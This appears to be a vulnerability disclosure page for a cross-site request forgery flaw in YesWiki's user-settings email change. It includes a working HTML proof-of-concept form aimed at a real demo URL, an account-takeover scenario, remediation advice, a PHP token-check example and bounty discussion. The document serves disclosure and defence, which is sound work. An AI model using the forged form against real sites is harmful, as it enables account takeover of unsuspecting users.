Cross-Site Request Forgery (CSRF) in yeswiki/yeswiki

Valid

Reported on

Dec 6th 2021


Description

Hey all,

So I found that YesWiki doesn't implement any sort of anti-CSRF mechanism; I found that the change-email function is vulnerable to CSRF attacks, which leads to Account Takeover.

Proof of Concept

<!-- PoC from the report: a forged cross-site POST to the user-settings update action -->
<html>
  <body>
    <form method="POST" action="https://yeswiki.net/cercopitheque/demo/?ParametresUtilisateur">
      <input type="hidden" name="usersettings_action" value="update"/>
      <input type="hidden" name="email" value="testerhacker@gmail.com"/>
      <input type="hidden" name="revisioncount" value="20"/>
      <input type="submit" value="Submit">
    </form>
  </body>
</html>

Exploitation Scenario:

  • An attacker sends the above PoC to the victim.

  • Rather than a submit button, the autosubmit attribute could be implemented, so the victim's email will be changed and he will be redirected to a third-party site.

  • The attacker now resets the password via the changed email and is able to take over the account.

NOTE: the attack could be applied to the admin account, which could be harmful to other users, compromising their confidentiality, integrity and availability.

Remediation Actions:

Implementing an anti-CSRF token and/or an anti-CSRF header with server-side checks should be sufficient to resolve the root cause of the issue.

Impact

Taking over user accounts.

Best Regards,

Moad
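The token-plus-header check the remediation section describes, as an added example in PHP; this is not YesWiki's code nor the merged fix, and the function names, the csrf_token field name and the $site_origin value are assumptions:

```php
<?php
// Added example (not YesWiki's code or its merged fix): synchronizer-token CSRF
// protection plus an Origin check for a POST handler like the ParametresUtilisateur
// "update" action. Function names, the csrf_token field and $site_origin are assumed.

session_start();
// One token per session, from a CSPRNG, stored only server-side.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to echo inside every state-changing form (echo csrf_field();).
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Constant-time comparison of the submitted token with the session copy.
function csrf_token_valid(array $post): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// Header-based check: a browser-sent Origin must match this site. A form hosted on
// another origin carries that origin. A missing header is tolerated only because
// the token check above is mandatory.
function origin_allowed(array $server, string $site_origin): bool
{
    $origin = $server['HTTP_ORIGIN'] ?? null;
    return $origin === null || $origin === $site_origin;
}

$site_origin = 'https://yeswiki.example'; // assumed deployment origin

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST'
    && ($_POST['usersettings_action'] ?? '') === 'update') {
    if (!csrf_token_valid($_POST) || !origin_allowed($_SERVER, $site_origin)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token');
    }
    // Safe to apply the email change here.
}
```

The forged form in the PoC above cannot include a valid csrf_token value, because the attacker's page never sees the victim's session token, so the update branch is never reached.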

We are processing your report and will contact the yeswiki team within 24 hours. 6 months ago
Moad Akhraz
6 months ago

Researcher


Hey @maintainer, we can work on a fix if you want; please ping me using @researcher.

Thanks,

Moad

We have contacted a member of the yeswiki team and are waiting to hear back 6 months ago
We have sent a follow up to the yeswiki team. We will try again in 7 days. 6 months ago
Jérémy Dufraisse validated this vulnerability 6 months ago
Moad Akhraz has been awarded the disclosure bounty
The fix bounty is now up for grabs
Moad Akhraz
6 months ago

Researcher


Hey @admin, I think that a CSRF that leads to Account Takeover deserves more than $5??

Jamie Slome
5 months ago

Admin


Hello @mdakh404, I would recommend creating an issue on our public roadmap where you can share your thoughts!

Moad Akhraz
5 months ago

Researcher


Hello @j9rem, can you please deploy a fix for this one?

Jérémy Dufraisse confirmed that a fix has been merged on f72309 3 months ago
Jérémy Dufraisse has been awarded the fix bounty
usersettings.php#L119-L127 has been validated